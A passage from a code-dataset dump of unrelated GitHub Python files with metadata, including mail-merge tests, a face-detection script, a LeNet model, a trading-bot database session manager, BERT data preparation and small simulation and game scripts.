u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' '],\n [u'Another User', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ', u' ']\n ]\n \n self.assertEquals( expectedOutcome, tableData )\n\n def _getFirstTableData( self, outFile ):\n #open file\n od = WriterDocument()\n od.open( outFile )\n #get table\n tables = od.oodocument.getTextTables()\n strings = od.getTextTableStrings( tables.getByIndex( 0 ) )\n od.close()\n return strings\n \n def test__readNamedRangesFromXML(self):\n #should convert the xml into a list of named ranges\n fixture = f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/namedRanges.xml' ) ) )\n x = pyMailMerge._readNamedRangesFromXML( fixture.read() )\n expected = [ 'first', 'second', 'third', 'all' ]\n self.assertEquals( expected, x )\n \n #if a list of named ranges was passed, the same list should be returned\n x = None\n x = pyMailMerge._readNamedRangesFromXML( expected )\n self.assertEquals( expected, x )\n \n #if a tuple of named ranges was passed, the same tuple should be returned\n expected = ( 'first', 'second', 'third', 'all' )\n x = None\n x = pyMailMerge._readNamedRangesFromXML( expected )\n self.assertEquals( expected, x )\n \n def test_calculatorXML(self):\n fixture = f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/calculator.xml' ) ) )\n params = pyMailMerge._readParamsFromXML( fixture.read() )\n \n self.assertEqual( [ { 'token':'title', 'value':'Calculator' } ], params )\n \n '''def test_calculator(self): \n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/calculator.ods' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/calculator.out.ods' )\n pmm = pyMailMerge( path, 'ods' )\n \n f = open( os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'fixtures/calculator.xml' ) ) )\n \n results = pmm.calculator( f.read() )\n \n expected = { 'totals':[ '1514', '1668', '910' ],\n 'test':[ ['a','b'],['c','d'],['e','f'],['g','h'] ],\n 'results':[ '151.4', '333.6', '455' ],\n 'more':[ '124', '548', '464' ]\n }\n \n self.assertEqual( expected, results )\n '''\n def test_deleteRow(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/deleteRow.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/deleteRow.out.odt' )\n pmm = pyMailMerge( path ) \n \n xml = \"\"\"\n \n deleterow|wanted\n 0\n \n \n deleterow|unwanted\n 1\n \n \n deleterow|another\n 0\n \n \"\"\"\n \n x = pyMailMerge._readParamsFromXML( xml )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n results = self._getFirstTableData( outFile )\n \n expected = [[ 'Wanted Row', '', \"Send value '0' to keep\" ],\n [ 'Another Wanted', '', \"Send value '0' to keep\"] ]\n \n self.assertEqual( expected, results )\n \n def test_deleteColumn(self):\n path = os.path.abspath( os.path.join( os.path.dirname( __file__ ), 'docs/deleteColumn.odt' ) )\n outFile = os.path.join( os.path.dirname( __file__ ), 'docs/deleteColumn.out.odt' )\n pmm = pyMailMerge( path ) \n \n xml = \"\"\"\n \n deletecolumn|wanted\n 0\n \n \n deletecolumn|unwanted\n 1\n \n \n deletecolumn|another\n 0\n \n \"\"\"\n \n x = pyMailMerge._readParamsFromXML( xml )\n pmm._process( x )\n pmm.document.refresh()\n pmm.document.saveAs( outFile )\n \n results = self._getFirstTableData( outFile )\n \n expected = [[ 'First', \"Third\" ],\n [ 'A', 'C' ],\n [ 'D', 'F' ] ]\n \n self.assertEqual( expected, results )\n \nif __name__ == '__main__':\n unittest.main()","repo_name":"bkulyk/pyMailMergeService","sub_path":"tests/testPyMailMerge.py","file_name":"testPyMailMerge.py","file_ext":"py","file_size_in_byte":16055,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"24877830752","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nimport time as time\nmp_drawing = mp.solutions.drawing_utils\nmp_pose = mp.solutions.pose\n\ncap = cv2.VideoCapture(0)\n## Setup mediapipe instance\nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n ret, frame = cap.read()\n \n # Recolor image to RGB\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n \n # Make detection\n results = pose.process(image)\n \n # Recolor back to BGR\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n \n # Render detections\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(245,0,0), thickness=2, circle_radius=2), \n mp_drawing.DrawingSpec(color=(0,245,0), thickness=2, circle_radius=2)\n ) \n \n if results.pose_landmarks != None:\n \n counter = 0 \n for i in range(0,11):\n if results.pose_landmarks.landmark[i].x >= 0 and results.pose_landmarks.landmark[i].x <= 1 and results.pose_landmarks.landmark[i].y >= 0 and results.pose_landmarks.landmark[i].y <= 1:\n counter += 0\n else:\n counter += 1\n if counter >= 1:\n print(\"Complete face not deteceted\")\n elif counter >= 8:\n print(\"No face detected\") \n else:\n print(\"Complete face detected\")\n\n cv2.imshow('Mediapipe Feed', image)\n\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()","repo_name":"adithya-s-k/computer_vision_projects","sub_path":"Face_detection_basic/Basic_face_detection_using_pose_estimation.py","file_name":"Basic_face_detection_using_pose_estimation.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"9996056731","text":"import pygame, random, math, time, csv\nfrom datetime import date, datetime\nfrom utils import *\n\npygame.init()\n\n# graphic stuff\nscreen_width = 700\nscreen_height = 500\nscreen = pygame.display.set_mode((screen_width, screen_height))\nfont = pygame.font.SysFont(\"Arial\", 20)\nitem_size = screen_height / 7\nin_game_bg = pygame.transform.scale(load_image(\"assets/images/bg00.jpg\"), (screen_width, screen_height))\nmain_menu_bg = pygame.transform.scale(load_image(\"assets/images/bg01.png\"), (screen_width, screen_height))\nconfirm_menu_bg = pygame.transform.scale(load_image(\"assets/images/bg01.png\"), (screen_width, screen_height))\n\nallowed_spawn_screen_x_percent = 60\nallowed_spawn_screen_x_pixels = screen_width / 100 * allowed_spawn_screen_x_percent\n\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\n\ndefault_bg_color = white\ndefault_text_color = black\n\n# game\nstatus = \"main_menu\"\nimmortality = False\nbonus_score_value = 5\nmalus_score_value = 10\n\ndefault_fruit_spawn_rate = 0.04\ndefault_malus_spawn_rate = 0.01\ndefault_bonus_spawn_rate = 0.003\nparty_banana_spawn_rate_multiplier = 10\n\n# images\nfruit_names = (\"apple\", \"orange\", \"watermelon\", \"peach\")\nmalus_names = (\"red_bomb\", \"purple_bomb\")\nbonus_names = (\"strawberry\", \"party_banana\")\nradiant_names = (\"red_radiant\", \"yellow_radiant\")\n\nitem_images = {\"apple\": \"assets/images/fruits/apple.png\",\n \"watermelon\": \"assets/images/fruits/watermelon.png\",\n \"peach\": \"assets/images/fruits/peach.png\",\n \"orange\": \"assets/images/fruits/orange.png\",\n \"red_bomb\": \"assets/images/malus/red_bomb.png\",\n \"purple_bomb\": \"assets/images/malus/purple_bomb.png\",\n \"strawberry\": \"assets/images/bonus/strawberry.png\",\n \"party_banana\": \"assets/images/bonus/party_banana.png\",\n \"red_radiant\": \"assets/images/radiants/red_radiant.png\",\n \"yellow_radiant\": \"assets/images/radiants/yellow_radiant.png\"}\n","repo_name":"JackMarelli/Python-General","sub_path":"projects/kung_fruit/gvars.py","file_name":"gvars.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38706714554","text":"import os.path\nimport argparse\nimport hashlib\n\n# Local imports\nfrom build import buildTreeHash\nfrom duplicates import findDuplicates\nfrom compare import compare\n\n\n\n###############################################################################\n# Helper functions #\n####################\ndef inexistentFile(x):\n if os.path.exists(x):\n raise argparse.ArgumentTypeError( \"{0} already exists\".format(x) )\n return os.path.abspath(x)\n\n\ndef isFolder(x):\n if os.path.exists(x) and os.path.isdir(x):\n return os.path.abspath(x)\n\n raise argparse.ArgumentTypeError(\n \"{0} is not an existing folder\".format(x) )\n\n\ndef isFile(x):\n if os.path.exists(x) and os.path.isfile(x):\n return os.path.abspath(x)\n\n raise argparse.ArgumentTypeError(\n \"{0} is not an existing file\".format(x) )\n\n\ndef commaSplitString( x ):\n hash_functions = x.split(',')\n\n for hash_function in hash_functions:\n if hash_function not in hashlib.algorithms_available:\n raise argparse.ArgumentTypeError(\n \"Invalid hash function {0}\".format( hash_function ) )\n\n return hash_functions\n\n\n# Argument parsing function\ndef parseArgs():\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers( dest='command' )\n\n\n # build command options\n parser_build = subparsers.add_parser( 'build' )\n parser_build.add_argument( 'path', type=isFolder, nargs='+' )\n parser_build.add_argument( '-o', '--out', metavar='OUTPUT_FILE',\n type=inexistentFile )\n parser_build.add_argument( '-p', '--partial', metavar='INPUT_FILE',\n type=isFile )\n parser_build.add_argument( '-H', '--hashes', metavar='HASHES',\n type=commaSplitString, default=[\"sha1\"] )\n parser_build.set_defaults( func=buildTreeHash )\n\n\n # find_duplicates command options\n parser_duplicates = subparsers.add_parser( 'find_duplicates' )\n parser_duplicates.add_argument( 'hash_db', type=isFile )\n parser_duplicates.add_argument( '-p', '--print-single-files',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( '--print-folders-with-both',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( '--print-folders-with-originals',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( '--dont-print-folders-with-duplicates',\n action=\"store_true\",\n default=False )\n parser_duplicates.add_argument( '-x', '--prefix', metavar='PREFIX',\n type=str, default=None )\n parser_duplicates.set_defaults( func=findDuplicates )\n\n\n # compare command options\n parser_compare = subparsers.add_parser( 'compare' )\n parser_compare.add_argument( 'hash_db1', type=isFile )\n parser_compare.add_argument( 'hash_db2', type=isFile )\n parser_compare.add_argument( '--db1-path', type=str )\n parser_compare.add_argument( '--db2-path', type=str )\n parser_compare.add_argument( '--print-single-files',\n action=\"store_true\",\n default=False )\n parser_compare.add_argument( '--print-all-folders',\n action=\"store_true\",\n default=False )\n parser_compare.add_argument( '--two-way',\n action=\"store_true\",\n default=False )\n parser_compare.set_defaults( func=compare )\n\n\n args = parser.parse_args()\n\n if not args.command:\n parser.print_usage()\n exit(1)\n\n return args\n###############################################################################\n\n\n\n###############################################################################\n# __ __ _ ___ _ _\n#| \\/ | / \\ |_ _| \\ | |\n#| |\\/| | / _ \\ | || \\| |\n#| | | |/ ___ \\ | || |\\ |\n#|_| |_/_/ \\_\\___|_| \\_|\n#\ndef main():\n args = parseArgs()\n args.func(args)\n###############################################################################\n\n\n\n###############################################################################\nif __name__ == '__main__':\n main()\n###############################################################################\n","repo_name":"felipou/hashtool","sub_path":"hashtool.py","file_name":"hashtool.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26107131155","text":"from typing import TYPE_CHECKING, Tuple\n\nimport tensorflow as tf\n\nif TYPE_CHECKING:\n from tensorflow.python.keras import Sequential, layers\nelse:\n from tensorflow.keras import Sequential, layers\n\n\n# noinspection PyPep8Naming\ndef LeNet(input_shape: Tuple[int, int, int] = (28, 28, 1), classes: int = 10) -> tf.keras.Model:\n \"\"\"A standard LeNet implementation in TensorFlow.\n\n The LeNet model has 3 convolution layers and 2 dense layers.\n\n Args:\n input_shape: shape of the input data (height, width, channels).\n classes: The number of outputs the model should generate.\n\n Raises:\n ValueError: Length of `input_shape` is not 3.\n ValueError: `input_shape`[0] or `input_shape`[1] is smaller than 18.\n\n Returns:\n A TensorFlow LeNet model.\n \"\"\"\n _check_input_shape(input_shape)\n model = Sequential()\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=input_shape))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(classes, activation='softmax'))\n return model\n\n\ndef _check_input_shape(input_shape):\n if len(input_shape) != 3:\n raise ValueError(\"Length of `input_shape` is not 3 (channel, height, width)\")\n\n height, width, _ = input_shape\n\n if height < 18 or width < 18:\n raise ValueError(\"Both height and width of input_shape need to not smaller than 18\")\n","repo_name":"fastestimator/fastestimator","sub_path":"fastestimator/architecture/tensorflow/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"31"} +{"seq_id":"35827790474","text":"# https://gist.github.com/nitred/4323d86bb22b7ec788a8dcfcac03b27a\r\n\r\nimport contextlib\r\nimport os\r\n\r\nfrom sqlalchemy import create_engine, MetaData\r\nfrom sqlalchemy.orm import sessionmaker, scoped_session\r\nfrom sqlalchemy_utils import database_exists, create_database\r\n\r\nfrom db.candle import Candle\r\nfrom globals import user_data_path\r\nfrom helpers.parameters import load_config\r\nfrom utilities.txcolors import txcolors\r\n\r\nconfig_file = user_data_path +'config.yml'\r\nparsed_config = load_config(config_file)\r\nDB_TYPE = parsed_config['data_options']['DB_TYPE']\r\nPOSTGRESS_HOST = parsed_config['data_options']['POSTGRESS_HOST']\r\nPOSTGRESS_PORT = parsed_config['data_options']['POSTGRESS_PORT']\r\nPOSTGRES_USER = parsed_config['data_options']['POSTGRES_USER']\r\nPOSTGRES_PASS = parsed_config['data_options']['POSTGRES_PASS']\r\nPOSTGRESS_DB = parsed_config['data_options']['POSTGRESS_DB']\r\n\r\n\r\nengine = None\r\nthread_safe_session_factory = None\r\n\r\n# def init_candle_engine(uri, clean_start=False, **kwargs):\r\n# \"\"\"Initialize the engine.\r\n# Args:\r\n# uri (str): The string database URI. Examples:\r\n# - sqlite:///database.db\r\n# - postgresql+psycopg2://username:password@0.0.0.0:5432/database\r\n# \"\"\"\r\n# global engine\r\n# if engine is None:\r\n# if DB_TYPE == 'SQLITE':\r\n# engine = create_engine(uri, **kwargs)\r\n# elif DB_TYPE == 'POSTGRES':\r\n# db_url = f\"postgres://{POSTGRES_USER}:{POSTGRES_PASS}@localhost/{POSTGRESS_DB}\"\r\n# engine = create_engine(db_url)\r\n# if not database_exists(db_url):\r\n# create_database(db_url)\r\n# else:\r\n# raise Exception(f'candle_db_manager: Unknown database type{txcolors.ERROR}')\r\n# if clean_start:\r\n# metadata = MetaData(engine)\r\n# metadata.reflect()\r\n# metadata.drop_all(engine, tables=metadata.sorted_tables)\r\n#\r\n# return engine\r\n\r\n\r\ndef init_candle_session_factory(uri, clean_start=False, **kwargs):\r\n \"\"\"Initialize the engine.\r\n Args:\r\n uri (str): The string database URI. Examples:\r\n - sqlite:///database.db\r\n - postgresql+psycopg2://username:password@0.0.0.0:5432/database\r\n \"\"\"\r\n clean_start = False\r\n try:\r\n global engine\r\n if engine is None:\r\n if DB_TYPE == 'SQLITE':\r\n engine = create_engine(uri, **kwargs)\r\n elif DB_TYPE == 'POSTGRES':\r\n if os.name == 'nt':\r\n db_host = f'{POSTGRESS_HOST}:{POSTGRESS_PORT}'\r\n else:\r\n db_host = f'{POSTGRESS_HOST}'\r\n db_url = f\"postgresql+psycopg2://{POSTGRES_USER}:{POSTGRES_PASS}@{db_host}/{POSTGRESS_DB}\"\r\n engine = create_engine(db_url)\r\n if not database_exists(db_url):\r\n create_database(db_url)\r\n print(f'Connected to POSTGRES database successfully{txcolors.SUCCESS}')\r\n else:\r\n print(f'candle_db_manager: Unknown database type{txcolors.ERROR}')\r\n exit(-1)\r\n\r\n # if clean_start:\r\n # metadata = MetaData(engine)\r\n # metadata.reflect()\r\n # metadata.drop_all(engine, tables=metadata.sorted_tables)\r\n\r\n Candle.metadata.create_all(engine)\r\n print('Candle DB created.')\r\n\r\n \"\"\"Initialize the thread_safe_session_factory.\"\"\"\r\n global thread_safe_session_factory\r\n # if engine is None:\r\n # raise ValueError(\"Initialize engine by calling init_candle_engine before calling init_session_factory!\")\r\n if thread_safe_session_factory is None:\r\n thread_safe_session_factory = scoped_session(sessionmaker(bind=engine))\r\n return thread_safe_session_factory\r\n except Exception as e:\r\n print(f'candle_db_manager: error {e}{txcolors.ERROR}')\r\n\r\n@contextlib.contextmanager\r\ndef ManagedCandleDBSession():\r\n \"\"\"Get a session object whose lifecycle, commits and flush are managed for you.\r\n Expected to be used as follows:\r\n ```\r\n with ManagedCandleDBSession() as session: # multiple db_operations are done within one session.\r\n db_operations.select(session, **kwargs) # db_operations is expected not to worry about session handling.\r\n db_operations.insert(session, **kwargs) # after the with statement, the session commits to the database.\r\n ```\r\n \"\"\"\r\n global thread_safe_session_factory\r\n if thread_safe_session_factory is None:\r\n raise ValueError(\"Call init_session_factory before using ManagedCandleDBSession!\")\r\n session = thread_safe_session_factory()\r\n try:\r\n yield session\r\n session.commit()\r\n session.flush()\r\n except Exception:\r\n session.rollback()\r\n # When an exception occurs, handle session session cleaning,\r\n # but raise the Exception afterwards so that user can handle it.\r\n raise\r\n finally:\r\n # source: https://stackoverflow.com/questions/21078696/why-is-my-scoped-session-raising-an-attributeerror-session-object-has-no-attr\r\n thread_safe_session_factory.remove()","repo_name":"mupsje/Binance-volatility-trading-bot","sub_path":"db/candle_db_manager.py","file_name":"candle_db_manager.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"35023434752","text":"import os\nimport random\nimport pandas as pd\nimport re\n\ndata_dir = 'NLPCC2016KBQA'\nfile_name_list = ['train.txt','dev.txt','test.txt']\nnew_dir = 'sim_data'\npattern = re.compile('^-+') # 以-开头\nfor file_name in file_name_list:\n\n q_t_a_list = []\n seq_q_list = []\n seq_tag_list = []\n attribute_classify_sample = []\n\n file_path_name = os.path.join(data_dir,file_name)\n assert os.path.exists(file_path_name)\n with open(file_path_name,'r',encoding='utf-8') as f:\n q_str = \"\"\n t_str = \"\"\n a_str = \"\"\n\n for line in f:\n if 'question' in line:\n q_str = line.strip()\n if 'triple' in line:\n t_str = line.strip()\n if 'answer' in line:\n a_str = line.strip()\n\n if '===' in line: # new question answer triple\n entities = t_str.split(\"|||\")[0].split(\">\")[1].strip()\n q_str = q_str.split(\">\")[1].replace(\" \", \"\").strip()\n q_t_a_list.append([q_str, t_str, a_str])\n df = pd.DataFrame(q_t_a_list, columns=[\"q_str\", \"t_str\", \"a_str\"])\n df['attribute'] = df['t_str'].apply(lambda x: x.split('|||')[1].strip())\n attribute_list = df['attribute'].tolist() # 转化成列表\n attribute_list = list(set(attribute_list)) # 去重\n attribute_list = [att.strip().replace(' ', '') for att in attribute_list] # 去尾部,去空格\n attribute_list = [re.sub(pattern, '', att) for att in attribute_list] # 去掉 以-开头\n\n attribute_list = list(set(attribute_list)) # 再去重\n\n for row in df.index:\n question, pos_att = df.loc[row][['q_str', 'attribute']]\n\n question = question.strip().replace(' ', '') # 去尾部,空格\n question = re.sub(pattern, '', question) # 去掉 以-开头\n\n pos_att = pos_att.strip().replace(' ', '') # 去尾部,空格\n pos_att = re.sub(pattern, '', pos_att) # 去掉 以-开头\n\n neg_att_list = []\n while True:\n neg_att_list = random.sample(attribute_list, 5)\n if pos_att not in neg_att_list:\n break\n attribute_classify_sample.append([question, pos_att, '1'])\n\n neg_att_sample = [[question, neg_att, '0'] for neg_att in neg_att_list]\n attribute_classify_sample.extend(neg_att_sample)\n seq_result = [str(lineno) + '\\t' + '\\t'.join(line) for (lineno, line) in enumerate(attribute_classify_sample)]\n\n if not os.path.exists(new_dir):\n os.makedirs(new_dir)\n\n file_type = file_name.split('.')[0]\n print(\"***** {} ******\".format(file_type))\n new_file_name = file_type + '.' + 'txt'\n with open(os.path.join(new_dir, new_file_name), \"w\", encoding='utf-8') as f:\n f.write(\"\\n\".join(seq_result))\n f.close()\n","repo_name":"1105425455/Bert","sub_path":"input/data_/5-bertforsequence-data.py","file_name":"5-bertforsequence-data.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21597050254","text":"# coding=utf-8 \n# @Time :2018/12/27 10:53\n\n\"\"\"Modifying a dictionary while iterating over it\"\"\"\n\nx = {0: None}\n\nfor i in x:\n del x[i]\n x[i + 1] = None\n print(i)\n\n\"\"\"\nPython不支持对字典进行迭代的同时修改它.因为字典的初始最小值是8, 扩容会导致散列表地址发生变化而中断循环\n\n在不同的Python实现中删除键的处理方式以及调整大小的时间可能会有所不同.\n(译: 就是说什么时候扩容在不同版本中可能是不同的, 在3.6及3.7的版本中到5就会自动扩容了.\n以后也有可能再次发生变化. 顺带一提,后面两次扩容会扩展为32和256. 8->32->256)\n\"\"\"\n\n\"\"\"Stubborn del operator/坚强的 del\"\"\"\n\n\nclass SomeClass:\n def __del__(self):\n print(\"Deleted!\")\n\n\nx = SomeClass()\ny = x\n\ndel x # print None\ndel y # print Deleted!\n\nx1 = SomeClass\ny1 = x1\ndel x1\nprint(y1) # 检查一下y是否存在-->是存在的\n\ndel y1\nglobals()\n\n\"\"\"\ndel x 并不会立刻调用 x.__del__().\n每当遇到 del x, Python 会将 x 的引用数减1, 当 x 的引用数减到0时就会调用 x.__del__().\n\n在第二个例子中, y1.__del__() 之所以未被调用, 是因为前一条语句 (>>> y1) 对同一对象创建了另一个引用, \n从而防止在执行 del y1 后对象的引用数变为0.\n调用 globals 导致引用被销毁, 因此我们可以看到 \"Deleted!\" 终于被输出了.\n\"\"\"\n","repo_name":"July523/Daily_Test","sub_path":"wtf_python/test20.py","file_name":"test20.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19522022004","text":"from django.core.management.base import BaseCommand\nfrom exercises.models import Video, Exercise\nfrom users.models import User\n\nimport pandas as pd\nimport numpy as np\nimport os\n\nadmin_username = os.environ.get(\"ADMIN_ID\")\nexercise_data = os.environ.get(\"EXERCISE_DATA\")\n\n\nclass Command(BaseCommand):\n\n help = \"This command creates videos in exercises\"\n\n def handle(self, *args, **options):\n admin = User.objects.get_or_none(username=admin_username)\n if not admin:\n\n df_django = pd.read_csv(exercise_data)\n\n # print(df_django.head())\n names = df_django[\"exercise_name_web\"].to_list()\n video_urls = df_django[\"video_url\"].to_list()\n\n for n in range(0, len(names)):\n one_exercise = Exercise.objects.get(name=names[n])\n Video.objects.create(\n video_caption=\"\", video_url=video_urls[n], exercise=one_exercise,\n )\n\n self.stdout.write(\n self.style.SUCCESS(\"Initial Seeding - Exercise Videos Created\")\n )\n else:\n self.stdout.write(\n self.style.SUCCESS(f\"Not initial seeding -- Superuser exists\")\n )\n","repo_name":"snoop2head/fitcuration-django","sub_path":"exercises/management/commands/seed_videos.py","file_name":"seed_videos.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"8661849094","text":"from models import area, sensor\nimport matplotlib.pyplot as plt\n\nradius_list = list(range(10, 250, 10))\n# angle_list = range(0, -180, -5)\n# RADIUS = 100\nANGLE = -30\n\nresult_list = []\n# 实验次数 ,用来计算修复的成功率 p = 成功修复次数/总次数。 \ntest_num = 100\n\nfor RADIUS in radius_list:\n success_num = 0\n for number in range(test_num):\n area_obj = area.Area(RADIUS, ANGLE)\n area_obj.standardSensor()\n area_obj.backupRandomSensor()\n area_obj.buildBarrier()\n\n day_num = 20\n success_tag = True\n for dn in range(day_num):\n # 存在传感器能量耗尽\n if area_obj.dayByDay() is False:\n print(\"检测到漏洞!\")\n success_tag = area_obj.repairBarrier()\n # 只要有一个不能修复则直接,修复失败\n if success_tag is False:\n break\n if success_tag:\n success_num += 1\n # 计算成功率\n print(\"半径:\",RADIUS)\n print(\"修补成功率:\",success_num/test_num)\n # print(\"半径\",RADIUS,\"的\", success_num,\"修补成功率!\" )\n result_list.append(success_num/test_num)\n\nplt.plot(radius_list, result_list)\nplt.title('Radius-P')\nplt.xlabel('Radius')\nplt.ylabel('P')\nplt.show()\n\n\n\n\n\n","repo_name":"leslieducy/Postgraduate","sub_path":"IoT/radius_plot.py","file_name":"radius_plot.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37792596240","text":"import textwrap\nimport copy\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nfrom tree_utils import hierarchical_tree_pos, draw_hierarchical_tree\nfrom tree_utils import DEFAULT_HIERARCHY\nfrom tree_plot import DISP_HIERARCHY\nimport networkx as nx\nimport csv\nimport numpy as np\n\nif __name__ == '__main__':\n G = nx.Graph()\n nodes = []\n node_sizes = []\n node_colors = []\n edges = []\n f1s = {}\n norm = matplotlib.colors.Normalize(0.3,1.0)\n cmap = plt.cm.ScalarMappable(norm, cmap=plt.cm.plasma)\n row_names = []\n #cmap.set_clim(0.5,0.6)\n np.set_printoptions(threshold=np.nan)\n #for f in ['merge_level_notuning0.csv', 'merge_level_notuning1.csv', 'merge_level_notuning2.csv']:\n for f in ['cell_merge_level_v4_0.csv', 'cell_merge_level_v4_1.csv', 'cell_merge_level_v4_2.csv']:\n for row in csv.DictReader(open(f)):\n try:\n DEFAULT_HIERARCHY[row['Name']]\n except:\n print(row['Name'], 'No code!')\n \n code = DEFAULT_HIERARCHY[row['Name']]\n if code == '' or int(float(row['count'])) == 0:\n continue\n\n print(row['Name'], code)\n row_names.append(row['Name'])\n G.add_edge(code[:-1], code)\n nodes.append(code)\n edges.append((code[:-1], code))\n #node_colors.append(plt.cm.viridis(float(row['f1_score'])))\n #node_colors.append(float(row['f1_score']))\n node_colors.append(cmap.to_rgba(float(row['f1_score'])))\n num = int(float(row['count']))\n node_sizes.append(max(300, np.sqrt(num) * 6)) # /3.0) # min(1000, lengths[code]))\n\n f1s[code] = float(row['f1_score'])\n print(row_names)\n #nmin = min(node_colors)\n #nmax = max(node_colors)\n #node_colors = list(map(plt.cm.viridis, map(lambda x: ((0.6-0.5) * (x - nmin) / (nmax - nmin)) + 0.5, node_colors)))\n print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')\n pos = hierarchical_tree_pos(G, '')\n print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')\n print(pos.keys())\n distances = np.ones([len(nodes),len(nodes)])\n print(len(nodes)) \n for i,(nodei,currname) in enumerate(zip(nodes,row_names)):\n print(currname)\n for j,nodej in enumerate(nodes):\n distances[i][j] = nx.shortest_path_length(G,source=nodei,target=nodej)\n key_string = ','.join(row_names)\n np.savetxt('distances.csv',distances,delimiter=',',header=key_string) \n# with open('distances.csv', 'w') as csvfile:\n# spamwriter = csv.writer(csvfile, delimiter=',',\n# quotechar='|', quoting=csv.QUOTE_MINIMAL)\n# spamwriter.writerow(DEFAULT_HIERARCHY)\n# for label in DEFAULT_HIERARCHY:\n# spamwriter.writerow(label+','+)\n\n #distances = get_tree_distances(G,nodes=nodes)\n fig, ax = draw_hierarchical_tree(G, pos, nodes=nodes, node_size=node_sizes,\n node_color=node_colors, edges=edges, sm=cmap)\n\n\n\n labels = {k: v for (k, v) in DISP_HIERARCHY.items()}\n labelpos = copy.deepcopy(pos)\n f_tex = \"{:.2f}\"\n l1 = len('(fibrillar center)')\n l2 = len('bodies/speckles')\n for c in labelpos:\n if c == '':\n continue\n originalpos = labelpos[c]\n if c in f1s:\n if f1s[c] <= 0.45:\n color = 'white'\n else:\n color = 'black'\n ax.text(originalpos[0]-0.010, originalpos[1]-0.0025,\n f_tex.format(f1s[c]), fontsize=8, color=color)\n if len(c) > 2:\n ax.text(originalpos[0], originalpos[1]-0.032,\n '\\n'.join(textwrap.wrap(labels[c], l1)), rotation=-40, fontsize=8,\n fontdict={'family': 'Sans-serif'})\n else: # if len(c) <= 2\n ax.text(originalpos[0]+0.0260, originalpos[1]-0.005,\n '\\n'.join(textwrap.wrap(labels[c], l2)), rotation=0, fontsize=8,\n fontdict={'family': 'Sans-serif'})\n \n fig.savefig('devin_tree2.pdf', transparent=True)\n #fig.savefig('devin_tree_prop.pdf', transparent=True)\n","repo_name":"CellProfiling/ProjectDiscovery","sub_path":"plotting_python/f1_tree_plots/plotting_pd_tree.py","file_name":"plotting_pd_tree.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8538127919","text":"#!/bin/python\n\nimport pygame\nimport pygame.gfxdraw\nimport pygame.draw\nimport pygame.image\nimport pygame.mixer\nimport pygame.font\nimport math\nimport os\nimport random\n\n# Seed initialization:\nrandom.seed()\n\n# Color declaration:\n\ncolors = 